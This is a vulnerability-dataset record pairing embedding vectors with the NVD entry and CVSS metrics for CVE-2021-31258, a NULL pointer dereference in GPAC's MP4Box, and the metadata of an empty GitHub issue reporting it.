-0.00688951788470149, -0.022641193121671677, -0.0052959490567445755, 0.02124268002808094, 0.021036583930253983, 0.0009900002041831613, -0.022700078785419464, 0.0016469333786517382, 0.00699624652042985, -0.005531487986445427, -0.01065814308822155, -0.0025670079048722982, -0.007640298921614885, 0.013609741814434528, -0.004545168019831181, 0.01703241840004921, -0.029295172542333603, -0.007978886365890503, 0.019800003618001938, -0.008000968024134636, 0.013013534247875214, -0.006734945345669985, 0.0020867290440946817, -0.0015944890910759568, 0.004751264583319426, -0.00814817938953638, -0.016252195462584496, 0.012505652382969856, 0.020153312012553215, 0.016782158985733986, -0.0010507251136004925, -0.0025486063677817583, 0.0009946005884557962, -0.004026246257126331, -0.010945206508040428, -0.007360596209764481, 0.04572402313351631, 0.009090336039662361, 0.007452603429555893, 0.011004091240465641, 0.0032938667573034763, 0.011681266129016876, -0.012969370000064373, 0.015251155011355877, -0.0032993871718645096, -0.00934059638530016, 0.02124268002808094, 0.002267063595354557, 0.007161859888583422, -0.0023241082672029734, -0.016752716153860092, 0.005218662787228823, 0.018195392563939095, 0.009502529166638851, -0.021964019164443016, 0.05823703482747078, -0.013808478601276875, 0.010496210306882858, 0.005222342908382416, 0.0008395679760724306, -0.01151933241635561, 0.006723904516547918, 0.001976320054382086, -0.0195055790245533, 0.007699183654040098, 0.016914648935198784, 0.008538291789591312, 0.00818498246371746, 0.012991451658308506, -0.004291227553039789, 0.012726470828056335, 0.007934722118079662, -0.037715695798397064, 0.009038811549544334, 0.0004197839880362153, 0.004681339021772146, -0.0036674169823527336, 0.008177622221410275, -0.0042176214046776295, 0.021713757887482643, -0.002033364726230502, 0.003453959710896015, 0.017356285825371742, 0.007305391598492861, -0.020079705864191055, -0.010400522500276566, 0.005719183012843132, -0.005770707502961159, 0.011681266129016876, 0.012380522675812244, 0.016605503857135773, 0.002410595305263996, 0.009097696281969547, 0.004968402441591024, 0.025850413367152214, -0.0003825209860224277, -0.012623421847820282, 0.013764314353466034, 0.04434023052453995, -0.004957361612468958, -0.008898960426449776, -0.0204771775752306, 0.014235393144190311, 0.012005132623016834, 0.002883513458073139, -0.01734156347811222, 0.018033459782600403, 0.0026553350035101175, -0.01358029991388321, 0.025129074230790138, 0.03232773765921593, 0.010982009582221508, 0.012248031795024872, -0.022346770390868187, 0.0057081421837210655, -0.022170115262269974, -0.0005957482499070466, 0.011953608132898808 ]
216
CVE-2021-31258
2021-04-19T19:15:18.327000
The gf_isom_set_extraction_slc function in GPAC 1.0.1 allows attackers to cause a denial of service (NULL pointer dereference) via a crafted file in the MP4Box command.
{ "cvssMetricV2": [ { "acInsufInfo": false, "baseSeverity": "MEDIUM", "cvssData": { "accessComplexity": "MEDIUM", "accessVector": "NETWORK", "authentication": "NONE", "availabilityImpact": "PARTIAL", "baseScore": 4.3, "confidentialityImpact": "NONE", "integrityImpact": "NONE", "vectorString": "AV:N/AC:M/Au:N/C:N/I:N/A:P", "version": "2.0" }, "exploitabilityScore": 8.6, "impactScore": 2.9, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "source": "[email protected]", "type": "Primary", "userInteractionRequired": true } ], "cvssMetricV30": null, "cvssMetricV31": [ { "cvssData": { "attackComplexity": "LOW", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "baseScore": 5.5, "baseSeverity": "MEDIUM", "confidentialityImpact": "NONE", "integrityImpact": "NONE", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "REQUIRED", "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H", "version": "3.1" }, "exploitabilityScore": 1.8, "impactScore": 3.6, "source": "[email protected]", "type": "Primary" } ] }
[ { "source": "[email protected]", "tags": [ "Patch", "Third Party Advisory" ], "url": "https://github.com/gpac/gpac/commit/ebfa346eff05049718f7b80041093b4c5581c24e" }, { "source": "[email protected]", "tags": [ "Exploit", "Third Party Advisory" ], "url": "https://github.com/gpac/gpac/issues/1706" } ]
[ { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:gpac:gpac:1.0.1:*:*:*:*:*:*:*", "matchCriteriaId": "82DD2D40-0A05-48FD-940D-32B4D8B51AB3", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true } ], "negate": false, "operator": "OR" } ], "operator": null } ]
https://github.com/gpac/gpac/issues/1706
[ "Exploit", "Third Party Advisory" ]
github.com
[ "gpac", "gpac" ]
null
null dereference issue with MP4Box
https://api.github.com/repos/gpac/gpac/issues/1706/comments
0
2021-03-12T06:50:09
2023-09-22T06:13:06Z
https://github.com/gpac/gpac/issues/1706
829,813,689
1,706
true
This is a GitHub Issue repo:gpac owner:gpac Title : null dereference issue with MP4Box Issue date: --- start body --- None --- end body ---
141
[ -0.013776463456451893, 0.03491547703742981, -0.00470778439193964, 0.033074840903282166, 0.014753418043255806, 0.006643993314355612, -0.03270671144127846, 0.05150953307747841, 0.00684929545968771, 0.02191774547100067, -0.02221507951617241, 0.03440576419234276, 0.02418314479291439, 0.018193993717432022, -0.0007548383437097073, 0.018618756905198097, -0.013634876348078251, 0.007553693372756243, -0.024494636803865433, -0.012360588647425175, 0.03837021440267563, -0.033980999141931534, -0.0169338658452034, 0.02702905423939228, -0.023248666897416115, 0.002458313014358282, -0.04298596456646919, 0.016367515549063683, -0.00458035571500659, 0.00662275543436408, -0.002348582725971937, 0.00414143456146121, -0.010647379793226719, 0.024296415969729424, 0.062468405812978745, -0.00938017200678587, 0.05530407652258873, 0.041570089757442474, 0.012672081589698792, -0.005762611515820026, -0.0027290990110486746, -0.041909899562597275, -0.0389365628361702, 0.003893656190484762, -0.005235197953879833, 0.02953515201807022, 0.021988539025187492, 0.0070687560364604, -0.027269752696156502, 0.00033693399745970964, 0.025726448744535446, -0.025485750287771225, -0.011065063066780567, -0.05895703658461571, -0.0008557194378226995, -0.05941011384129524, 0.03231026604771614, 0.005022816825658083, -0.005238737445324659, 0.02814759500324726, 0.006173214875161648, 0.039474595338106155, -0.016140975058078766, 0.026703402400016785, -0.0038370213005691767, 0.040692247450351715, 0.0033042982686311007, 0.01277119293808937, -0.015064910054206848, 0.029931597411632538, 0.020714251324534416, -0.02394244633615017, -0.008615599013864994, 0.027000736445188522, 0.02540079690515995, -0.04791320860385895, 0.038115356117486954, 0.04202317073941231, -0.02617952972650528, 0.019935520365834236, -0.037605639547109604, 0.02041691727936268, -0.03817199170589447, 0.014654306694865227, -0.015093227848410606, -0.0008088186150416732, -0.016070181503891945, -0.06858498603105545, -0.025188416242599487, -0.018618756905198097, 0.006229849997907877, 0.03780386224389076, 0.006109500769525766, 0.005436960142105818, 0.028289182111620903, -0.006417453289031982, -0.004413990303874016, 0.0010486324317753315, -0.03004486858844757, -0.02472117729485035, -0.02306460402905941, -0.03296156972646713, 0.017967453226447105, 0.011978302150964737, 0.0014689703239127994, 0.005033435765653849, 0.03627471625804901, -0.0196381863206625, 0.0018742645625025034, 0.1361505389213562, 0.0182931050658226, -0.01568789593875408, -0.03061121702194214, -0.005192721728235483, 0.016537420451641083, 0.031347472220659256, -0.031347472220659256, -0.02685914933681488, -0.019128471612930298, -0.03613312914967537, -0.006990883033722639, 0.002605210058391094, -0.024834448471665382, 0.012141128070652485, -0.01469678245484829, 0.035821639001369476, -0.02902543731033802, 0.0037520688492804766, -0.027524610981345177, -0.0036069415509700775, -0.048960957676172256, -0.00034157984191551805, 0.021054061129689217, -0.02603794075548649, -0.020813362672924995, 0.002205225406214595, -0.023036286234855652, 0.011822556145489216, 0.004364434629678726, 0.010774808935821056, -0.06903806328773499, -0.0457327626645565, 0.04491155594587326, -0.030979344621300697, -0.024806130677461624, 0.0002685737854335457, -0.0007353700930252671, -0.006753723602741957, -0.03471725434064865, -0.004084799438714981, -0.010173061862587929, -0.023078761994838715, 0.020091267302632332, 0.0032653617672622204, 0.060203004628419876, 0.0029414803721010685, 0.0037980847992002964, 0.024098193272948265, -0.03788881376385689, 0.009677506051957607, 0.009748299606144428, -0.030299725010991096, 0.007546613924205303, -0.011249126866459846, -0.010909317061305046, -0.028713945299386978, 0.02323450893163681, 0.018009930849075317, -0.016480784863233566, 0.016070181503891945, -0.011532302014529705, -0.010491633787751198, 0.022469935938715935, 0.008912933059036732, -0.04423193633556366, -0.007659883704036474, 0.008325344882905483, 0.045874349772930145, -0.03842684626579285, -0.01539056096225977, -0.026575973257422447, 0.03143242374062538, 0.002725559286773205, -0.02479197084903717, 0.0004083914391230792, -0.007532455027103424, 0.03253680840134621, -0.008948329836130142, 0.013217193074524403, -0.03180055320262909, 0.005082991439849138, 0.004460006486624479, -0.015291450545191765, -0.017868341878056526, 0.04106037691235542, -0.011935826390981674, -0.05066000670194626, -0.01595691218972206, -0.018137358129024506, 0.0007238661055453122, 0.012488017790019512, -0.018406374379992485, 0.01673564314842224, -0.01395344827324152, -0.051934294402599335, -0.003594552632421255, -0.016721483319997787, 0.024225620552897453, 0.015064910054206848, -0.014229543507099152, -0.023347778245806694, -0.022852223366498947, 0.012098652310669422, 0.00845277402549982, -0.01625424437224865, 0.013408336788415909, -0.022257555276155472, -0.0087217902764678, -0.006728945765644312, -0.02503266930580139, 0.03228195011615753, 0.00113446987234056, 0.022158443927764893, -0.0003517564618960023, -0.018193993717432022, -0.017259515821933746, -0.00662983488291502, -0.0023715905845165253, 0.001817629556171596, 0.008750107139348984, 0.005589166656136513, 0.027765309438109398, 0.011022587306797504, -0.007072295527905226, 0.007426264230161905, 0.01339417789131403, 0.002290177857503295, -0.02004878968000412, -0.0050475941970944405, 0.007291756104677916, -0.009373093023896217, 0.042221393436193466, -0.027170641347765923, -0.011015507392585278, 0.008643916808068752, 0.06099589541554451, -0.011765921488404274, -0.0171037707477808, -0.015772847458720207, 0.009896966628730297, -0.004898927640169859, -0.014583512209355831, -0.011072142980992794, -0.00650240620598197, -0.010895158164203167, -0.0026016703341156244, 0.015319767408072948, 0.025117622688412666, -0.002286638133227825, -0.03349960222840309, -0.009790775366127491, -0.02248409576714039, -0.010250935330986977, -0.027383022010326385, 0.011072142980992794, -0.029818328097462654, -0.0321686789393425, 0.003578623989596963, -0.019284218549728394, -0.0032635917887091637, 0.040012627840042114, -0.016806436702609062, -0.01495163980871439, -0.01856212131679058, -0.009776617400348186, -0.02235666662454605, 0.004240545444190502, 0.027510451152920723, -0.0019114313181489706, 0.02634943462908268, -0.006272326223552227, 0.0036954337265342474, -0.011135856620967388, 0.005727214273065329, 0.007836868055164814, 0.00244238437153399, 0.023177873343229294, 0.008594361133873463, -0.009741219691932201, 0.03749237209558487, 0.026830831542611122, 0.050716642290353775, -0.03865338861942291, 0.03587827458977699, 0.01686307229101658, 0.009394330903887749, 0.002872456330806017, 0.01635335572063923, -0.013316304422914982, 0.022809745743870735, 0.004601593594998121, 0.026660926640033722, 0.004810435231775045, -0.0006659037317149341, -0.019057678058743477, 0.01669316552579403, -0.007312994450330734, 0.009323537349700928, -0.0018264787504449487, 0.010307569988071918, 0.019397487863898277, -0.0365862101316452, -0.012034937739372253, -0.011270364746451378, -0.016098499298095703, 0.0013052597641944885, -0.007376709021627903, -0.012020778842270374, -0.02408403344452381, 0.023418571799993515, -0.00414143456146121, 0.03477388992905617, -0.029280295595526695, -0.00858728215098381, 0.021889427676796913, -0.011348238214850426, -0.024777812883257866, 0.02888385020196438, -0.05006533861160278, 0.005320150405168533, 0.006704168394207954, -0.0144773218780756, 0.02851572260260582, -0.03236690163612366, 0.002953869290649891, -0.03270671144127846, -0.011921667493879795, -0.02282390557229519, 0.0348871611058712, -0.026023782789707184, 0.0012760573299601674, 0.015857800841331482, 0.046582289040088654, -0.012799509800970554, -0.020770886912941933, -0.02763788029551506, -0.003341465024277568, 0.0015751610044389963, 0.006774961948394775, 0.01029341109097004, 0.0007937749032862484, 0.0013229582691565156, -0.010661538690328598, 0.017924977466464043, 0.02235666662454605, 0.01768427900969982, 0.004049402661621571, -0.0009946521604433656, 0.0013415415305644274, 0.008997885510325432, 0.03304652124643326, -0.04788489267230034, -0.0006074988632462919, 0.016480784863233566, -0.008268710225820541, 0.024834448471665382, -0.0014185297768563032, -0.0201479010283947, -0.00248486059717834, 0.0028830755036324263, -0.01383309904485941, 0.014668464660644531, -0.04338240996003151, 0.022300031036138535, -0.007298835553228855, -0.005401563365012407, 0.00990404561161995, 0.02688746713101864, -0.02956346981227398, 0.001819399418309331, -0.05165112018585205, 0.01919926516711712, 0.014795893803238869, -0.05335016921162605, 0.003343234769999981, 0.013238430954515934, -0.04845124110579491, 0.04057897627353668, -0.04253288358449936, -0.025896353647112846, -0.036897704005241394, 0.03313147649168968, -0.029280295595526695, -0.045364636927843094, -0.01338001899421215, 0.05043346807360649, -0.024367209523916245, -0.01639583334326744, 0.0014282639604061842, -0.012700398452579975, 0.04004094377160072, -0.017613485455513, 0.0031184647232294083, 0.02919534221291542, 0.0016486094100400805, 0.024027399718761444, 0.003504290711134672, 0.005875881295651197, 0.024806130677461624, 0.007546613924205303, 0.030016550794243813, -0.02902543731033802, -0.0017645342741161585, 0.009606711566448212, 0.023022128269076347, 0.023899970576167107, 0.009238584898412228, 0.0169338658452034, -0.0629781186580658, 0.03061121702194214, 0.0033237666357308626, -0.005741373170167208, 0.01036420464515686, -0.0016202919650822878, 0.06207196041941643, 0.018378058448433876, -0.028912167996168137, 0.005242277402430773, 0.04360894858837128, -0.04060729593038559, -0.01019429974257946, -0.010873920284211636, -0.01539056096225977, -0.00001671672725933604, 0.023786699399352074, -0.0369260199368, -0.02204517461359501, -0.040154214948415756, -0.0270998477935791, 0.007900582626461983, -0.01737278699874878, 0.038625068962574005, 0.005185642279684544, 0.029506836086511612, 0.04921581596136093, -0.046922098845243454, -0.02858651615679264, -0.027283910661935806, 0.029478518292307854, -0.026023782789707184, 0.016169292852282524, 0.004339656792581081, 0.02851572260260582, -0.010215538553893566, -0.01530560851097107, 0.015532149001955986, 0.005348467733711004, 0.0024919400457292795, 0.03112093359231949, 0.003185718785971403, -0.020501870661973953, 0.015319767408072948, 0.0029414803721010685, 0.0025822019670158625, 0.028062643483281136, 0.005741373170167208, -0.0018884233431890607, -0.005132547114044428, 0.004304260015487671, -0.017769230529665947, 0.003185718785971403, 0.006244008895009756, 0.021903585642576218, 0.017089610919356346, 0.005497134756296873, 0.017386944964528084, -0.00962087046355009, 0.009394330903887749, -0.018703708425164223, -0.03265007957816124, -0.0082970280200243, -0.007171406876295805, -0.010590745136141777, 0.012580049224197865, -0.016806436702609062, -0.008700552396476269, 0.00911115575581789, -0.0032458934001624584, -0.012778271920979023, 0.00037786163738928735, 0.015857800841331482, 0.01568789593875408, -0.003638798836618662, -0.023928288370370865, 0.01856212131679058, -0.007312994450330734, 0.019355012103915215, 0.006527183577418327, 0.022682318463921547, 0.030356360599398613, 0.018038246780633926, -0.03281998261809349, 0.028997119516134262, 0.011128777638077736, 0.030696170404553413, -0.04202317073941231, -0.022059332579374313, 0.030696170404553413, -0.015928594395518303, -0.002327344613149762, -0.021648729220032692, -0.010590745136141777, -0.010222617536783218, -0.0535200759768486, -0.00867223460227251, -0.04386380687355995, 0.0024353049229830503, 0.00946512445807457, 0.02736886404454708, 0.012636684812605381, -0.030696170404553413, -0.009748299606144428, -0.00904036220163107, 0.034660618752241135, -0.004966181702911854, 0.02990327961742878, -0.015248973853886127, -0.002329114358872175, -0.008948329836130142, -0.011574777774512768, -0.014625988900661469, -0.0092315049842, -0.01446316298097372, 0.051594484597444534, -0.020091267302632332, -0.0020831061992794275, -0.0008769576088525355, 0.005044054705649614, -0.0033308458514511585, -0.016891388222575188, -0.01703297719359398, 0.04995207116007805, -0.015489672310650349, 0.02201685681939125, -0.01673564314842224, 0.05207588151097298, 0.004399831406772137, 0.016282562166452408, -0.00911115575581789, 0.0002475568908266723, 0.01049871277064085, -0.022597365081310272, -0.0055183726362884045, 0.022838063538074493, -0.002247701631858945, 0.009012044407427311, 0.0009592553251422942, 0.028218388557434082, 0.031205885112285614, 0.008658075705170631, 0.017500214278697968, 0.009486362338066101, 0.008707631379365921, -0.037067607045173645, -0.0036635766737163067, 0.009082837961614132, 0.0043538156896829605, 0.01571621187031269, -0.020785044878721237, 0.00033870385959744453, 0.01771259680390358, 0.0034919017925858498, 0.03174391761422157, 0.012353509664535522, -0.0018494867254048586, -0.005302452016621828, -0.0009672196465544403, -0.005663500167429447, -0.021818634122610092, -0.01022969651967287, 0.004279482178390026, -0.023659272119402885, -0.017967453226447105, 0.012077413499355316, 0.0007720943540334702, -0.009309378452599049, 0.018038246780633926, 0.009960680268704891, -0.020062949508428574, -0.020303647965192795, -0.02831749990582466, 0.010541189461946487, 0.007128930650651455, -0.012303953990340233, 0.010173061862587929, -0.02583971805870533, 0.020431077107787132, 0.02248409576714039, 0.006392675451934338, -0.009373093023896217, -0.0259105134755373, 0.014066718518733978, -0.02160625346004963, -0.029846645891666412, -0.028968803584575653, 0.0020176218822598457, 0.01468262355774641, -0.0017140937270596623, -0.04454342648386955, 0.0514812171459198, 0.014420687220990658, 0.015857800841331482, 0.06320466101169586, -0.008997885510325432, 0.0015123315388336778, -0.009323537349700928, 0.020133743062615395, -0.000653957249596715, -0.001454811543226242, 0.023659272119402885, 0.031715601682662964, -0.04273110628128052, 0.02428225614130497, -0.030894393101334572, 0.002716710092499852, 0.023050446063280106, -0.004307799506932497, -0.02756708674132824, 0.007751915603876114, -0.014335734769701958, -0.04196653515100479, 0.024777812883257866, 0.0016114427708089352, -0.04026748612523079, -0.02627864107489586, 0.00492016552016139, 0.034264177083969116, 0.002826440380886197, -0.02627864107489586, 0.0043962919153273106, 0.0036529575008898973, 0.0005867031868547201, -0.03771891072392464, 0.013103922829031944, -0.013167637400329113, 0.01373398769646883, 0.009507601149380207, -0.003555616131052375, 0.004198069218546152, 0.01322427298873663, -0.041881583631038666, -0.034830525517463684, 0.003791005350649357, 0.006332500837743282, 0.03681274875998497, -0.02072840929031372, 0.021889427676796913, 0.06025964021682739, 0.0008349238196387887, -0.01308976486325264, -0.0007676697568967938, -0.04751676693558693, -0.005337848793715239, -0.013188875280320644, 0.0002053018833976239, -0.006980263628065586, -0.021422188729047775, 0.009302298538386822, -0.022101808339357376, -0.006339580286294222, 0.00858728215098381, -0.02462206594645977, 0.01700465939939022, -0.0143074169754982, 0.014810052700340748, -0.007773153949528933, -0.015149862505495548, -0.0001468970294808969, -0.013118081726133823, 0.01451271865516901, -0.0014326885575428605, -0.010781887918710709, 0.010342966765165329, 0.01754269190132618, -0.0029662582091987133, 0.008013852871954441, -0.006753723602741957, -0.008608520030975342, -0.029308613389730453, -0.016749801114201546, 0.020770886912941933, 0.008799662813544273, -0.0065130251459777355, 0.04559117555618286, -0.009507601149380207, -0.03814367204904556, 0.034660618752241135, -0.006120119709521532, -0.01635335572063923, -0.02465038374066353, -0.01378354337066412, -0.006374977063387632, 0.0001320745941484347, -0.02547159232199192, -0.0036883545108139515, 0.01919926516711712, 0.002421146258711815, -0.0005663500051014125, 0.03338633105158806, -0.02309292182326317, -0.019298376515507698, 0.016707325354218483, -0.020176218822598457, 0.017769230529665947, -0.009812014177441597, -0.005943135358393192, 0.009302298538386822, -0.018236469477415085, 0.006006849929690361, 0.027453815564513206, -0.040154214948415756, -0.03347128629684448, -0.017528532072901726, -0.0039644502103328705, 0.0184630099684, 0.02482028864324093, 0.020374441519379616, -0.0020211616065353155, 0.03109261579811573, 0.0051006898283958435, -0.03208372741937637, -0.031149249523878098, 0.02865730971097946, 0.016112657263875008, -0.0022176143247634172, -0.015135703608393669, 0.0007167867152020335, -0.0028370595537126064, 0.031347472220659256, 0.011298682540655136, 0.0066652316600084305, -0.0016211768379434943, -0.011242047883570194, -0.036387987434864044, 0.01014474406838417, -0.009564235806465149, 0.0039538308046758175, -0.022809745743870735, -0.012580049224197865, 0.004902467131614685, 0.024126511067152023, 0.014753418043255806, 0.012332271784543991, -0.03078112192451954, -0.02865730971097946, -0.01934085227549076, 0.01788250170648098, -0.015248973853886127, 0.007992614060640335, -0.004428149200975895, 0.00884213950484991, -0.0186329148709774, 0.004286561626940966, -0.0022317729890346527, 0.0009769537718966603, 0.00980493426322937, 0.012792430818080902, -0.024098193272948265, 0.016339197754859924, -0.011404872871935368, 0.007631566375494003, -0.027722831815481186, -0.0264202281832695, -0.018109042197465897, 0.021323077380657196, -0.010590745136141777, -0.02204517461359501, 0.010604904033243656, 0.010215538553893566, -0.00988988671451807, -0.04646901786327362, 0.003461814485490322, -0.034264177083969116, 0.009238584898412228, 0.02092663198709488, -0.0048245941288769245, 0.015291450545191765, -0.005433420184999704, 0.0009866879554465413, 0.01420830562710762, 0.006576739251613617, -0.0033255363814532757, 0.02374422363936901, -0.03647293895483017, -0.013280907645821571, -0.0199779961258173, 0.017245357856154442, 0.011822556145489216, 0.009642109274864197, -0.009705822914838791, -0.003897195914760232, 0.01381894014775753, -0.012381826527416706, -0.030469629913568497, -0.02058682218194008, -0.00902620330452919, -0.024438003078103065, 0.01856212131679058, -0.0328482985496521, 0.0067360252141952515, -0.006215691100805998, 0.007270518224686384, 0.023149555549025536, -0.007879344746470451, 0.010165982879698277, 0.005281213670969009, -0.003660036949440837, -0.027821943163871765, -0.017939137294888496, 0.028940485790371895, -0.023347778245806694, -0.007780233398079872, -0.00654488243162632, -0.06558333337306976, 0.026292799040675163, -0.03834189474582672, 0.0004179043462499976, 0.020516028627753258, 0.020869998261332512, 0.015871958807110786, -0.00654488243162632, 0.015107386745512486, -0.0009406719473190606, -0.004789197351783514, -0.014250782318413258, 0.012700398452579975, -0.013054367154836655, -0.005267055239528418, -0.012799509800970554, 0.01049871277064085, -0.05805087462067604, -0.01666484959423542, -0.012941097840666771, -0.0518210269510746, -0.017415262758731842, -0.004279482178390026, 0.017316151410341263, -0.010725253261625767, 0.014668464660644531, -0.009493442252278328, 0.0008331539575010538, 0.03112093359231949, -0.0016229467000812292, 0.03112093359231949, -0.0031503220088779926, 0.008212074637413025, -0.01839221641421318, -0.004566196817904711, 0.010187220759689808, -0.010321728885173798, 0.052245788276195526, -0.0007459891494363546, -0.013337542302906513, -0.0012902161106467247, 0.0013884424697607756, -0.0023432732559740543, 0.010994269512593746, -0.04779994115233421, -0.011596016585826874, -0.018717868253588676, -0.00675726355984807, -0.028898008167743683, 0.01032880786806345, 0.021223966032266617, -0.023885810747742653, 0.01530560851097107, -0.004049402661621571, 0.00423346646130085, 0.005263515282422304, -0.003033512271940708, 0.0005610404768958688, 0.023758383467793465, -0.017528532072901726, 0.0045060222037136555, 0.02357431873679161, -0.037407416850328445, 0.010314649902284145, -0.053831566125154495, -0.038256943225860596, 0.015560466796159744, 0.014130432158708572, -0.012657922692596912, -0.048819370567798615, -0.02503266930580139, 0.03270671144127846, 0.031234202906489372, 0.018236469477415085, -0.04256120324134827, -0.016409991309046745, -0.02045939303934574, -0.009861569851636887, -0.005776769947260618, 0.01468262355774641, -0.0008535071392543614, -0.012657922692596912, 0.007957217283546925, 0.022059332579374313, 0.00907575897872448, -0.01649494469165802, 0.03332969918847084, 0.024905242025852203, 0.008035090751945972, -0.02695826068520546, -0.038115356117486954, -0.02452295459806919, -0.02688746713101864, -0.03570836782455444, 0.019793933257460594, 0.00951468013226986, 0.05980655923485756, -0.009033282287418842, 0.01282074861228466, -0.007001501973718405, 0.01656573824584484, 0.02391412854194641, -0.008346582762897015, -0.02489108219742775, 0.011737603694200516, -0.008410297334194183, 0.02455127239227295, 0.019581550732254982, -0.02783610299229622, -0.017457738518714905, 0.015333926305174828, 0.025485750287771225, -0.0054900553077459335, -0.009592553600668907, -0.018434692174196243, -0.007532455027103424, -0.04182494804263115, 0.010590745136141777, 0.026944100856781006, 0.007900582626461983, 0.00020331080304458737, -0.011319920420646667, 0.03573668375611305, -0.0001901475916383788, -0.0022795586846768856, -0.01751437410712242, -0.03165896609425545, -0.014583512209355831, -0.013634876348078251, -0.01673564314842224, -0.03783218190073967, -0.03678443282842636, 0.022540729492902756, -0.004654689226299524, -0.012742875143885612, -0.015107386745512486, 0.0017857723869383335, -0.0053767855279147625, 0.021648729220032692, -0.00033848261227831244, -0.023546000942587852, 0.026193687692284584, 0.0031609409488737583, -0.019765615463256836, -0.00899080652743578, -0.026023782789707184, -0.03800208494067192, -0.002635297365486622, -0.010470395907759666, 0.012919859029352665, 0.05805087462067604, 0.012367668561637402, 0.05604033172130585, -0.011079221963882446, -0.021563775837421417, -0.00806340854614973, 0.003293679328635335, 0.020204536616802216, -0.02516009844839573, 0.022668158635497093, -0.01625424437224865, -0.010980110615491867, 0.0022972573060542345, -0.002828210359439254, 0.026986578479409218, 0.021209808066487312, -0.012240239419043064, -0.017924977466464043, 0.02377254143357277, 0.01444192510098219, -0.03610481321811676, 0.03975776955485344, -0.00457327626645565, 0.012976494617760181, -0.034320808947086334, -0.03078112192451954, -0.04219307377934456, -0.04108869284391403, -0.025698130950331688, 0.007489978801459074, -0.02201685681939125, -0.014406528323888779, 0.00518210232257843, 0.02011958323419094, 0.01751437410712242, 0.0018247088883072138, 0.01822231151163578, -0.010017315857112408, -0.004357355181127787, 0.005267055239528418, -0.005125467665493488, -0.014668464660644531, -0.006973184645175934, -0.03140410780906677, 0.025995464995503426, 0.01002439484000206, 0.03406595438718796, -0.024834448471665382, 0.0038830372504889965, -0.0017663040198385715, 0.002826440380886197, 0.005521912593394518, 0.03259344398975372, 0.0006552846753038466, -0.007167867384850979, 0.012891542166471481, 0.028982961550354958, 0.004194529727101326, -0.009019123390316963, 0.005851103458553553, 0.028898008167743683, 0.007999693974852562, -0.017259515821933746, 0.018689550459384918, -0.010619062930345535, -0.0036918940022587776, 0.0037379099521785975, 0.029818328097462654, 0.007582010701298714, -0.0525006465613842, -0.022597365081310272, -0.0014406528789550066, 0.004654689226299524, 0.025967147201299667, 0.00045484985457733274, -0.00020253649563528597, -0.006268786732107401, 0.0018512565875425935, -0.005277674179524183, 0.037237513810396194, -0.009266901761293411, -0.009096996858716011, -0.0032653617672622204, -0.007397946901619434, -0.002971567679196596, 0.015871958807110786, -0.018165675923228264, -0.023687588050961494, -0.03788881376385689, 0.01885945536196232, -0.0264202281832695, -0.011709285899996758, -0.01890193112194538, 0.001377823413349688, 0.00014070258475840092, -0.022059332579374313, 0.009486362338066101, 0.005284753628075123, 0.018378058448433876, -0.01849132776260376, -0.010937634855508804, 0.010718174278736115, -0.01356408279389143, 0.026066258549690247, 0.0023149556946009398, -0.03163064643740654, -0.026193687692284584, 0.006955485790967941, -0.02919534221291542, -0.011652651242911816, 0.004314878955483437, -0.055870428681373596, -0.0005721019697375596, -0.014130432158708572, -0.019298376515507698, 0.01977977342903614, -0.004222847055643797, -0.02875642105937004, -0.01907183602452278, 0.004127275664359331, -0.020204536616802216, -0.022611523047089577, -0.0034370366483926773, 0.03508538380265236, 0.04193821921944618, 0.03163064643740654, -0.020940791815519333, -0.006364358123391867, -0.012388906441628933, -0.0019291297066956758, 0.007560772355645895, 0.001572506153024733, -0.00033295186585746706, 0.00845277402549982, 0.036387987434864044, 0.009302298538386822, 0.007182025816291571, -0.008658075705170631, 0.009089917875826359, -0.003812243463471532, -0.008622678928077221, -0.026476861909031868, 0.003812243463471532, 0.005769690498709679, -0.0022972573060542345, 0.00711123226210475, 0.027383022010326385, -0.027213117107748985, -0.000004106590495212004, 0.007213883101940155, 0.005504214204847813, -0.01669316552579403, 0.002645916538313031, -0.0013495058519765735, 0.0017371017020195723, -0.0013300376012921333, 0.003532608039677143, -0.007397946901619434, 0.016608214005827904, -0.010576586239039898, 0.02523089200258255, -0.008275789208710194, 0.0069023906253278255, -0.006990883033722639, 0.013018970377743244, -0.001113231759518385, -0.010951792821288109, -0.012509255670011044, -0.003106075804680586, -0.019581550732254982, 0.042419616132974625, -0.0011185412295162678, -0.018378058448433876, -0.017457738518714905, -0.014165829867124557, -0.016041863709688187, 0.012615446001291275, 0.0365862101316452, -0.013925130479037762, 0.020884156227111816, 0.009507601149380207, 0.0010999578516930342, -0.005256435833871365, -0.003698973450809717, -0.01754269190132618, 0.004867070354521275, 0.005624563433229923, 0.012126969173550606, 0.01696218177676201, -0.028161754831671715, -0.025967147201299667, 0.012155286967754364, -0.0055997855961322784, 0.026406068354845047, 0.00479981629177928, 0.01452687755227089, 0.004194529727101326, -0.006031627766788006, 0.02888385020196438, 0.036557894200086594, -0.01902936026453972, 0.013592399656772614, -0.028133437037467957, -0.018434692174196243, 0.009436806663870811, 0.015503831207752228, 0.011327000334858894, 0.022073490545153618, -0.02221507951617241, 0.03364118933677673, -0.010484554804861546, 0.017769230529665947, -0.02936524711549282, 0.0010424379725009203, -0.009096996858716011, 0.0002045275759883225, 0.025528226047754288, 0.010307569988071918, 0.01359947957098484, 0.019581550732254982, 0.0039644502103328705, -0.01246677991002798, -0.0033308458514511585, -0.007036898750811815, 0.02053018845617771, 0.004902467131614685, 0.02150714211165905, 0.004697165451943874, -0.019963838160037994, 0.016480784863233566, 0.02367343008518219, 0.011596016585826874, 0.013450812548398972, -0.010909317061305046, -0.04128691554069519, -0.034490715712308884, -0.0004083914391230792, -0.030328042805194855, -0.011234967969357967, -0.0033326158300042152, -0.011765921488404274, 0.014583512209355831, -0.001391097204759717, -0.03392436355352402, -0.010951792821288109, -0.026745878159999847, 0.009606711566448212, -0.006877612788230181, -0.006268786732107401, 0.003985688090324402, 0.010038553737103939, -0.001358355046249926, 0.03851180151104927, 0.035311922430992126, 0.030328042805194855, 0.013450812548398972, -0.010562427341938019, -0.02503266930580139, 0.040890470147132874, -0.03525528684258461, 0.018519645556807518, 0.004555577877908945, 0.0020229313522577286, -0.004247624892741442, -0.015263132750988007, 0.02428225614130497, 0.018802819773554802, 0.03876665607094765, 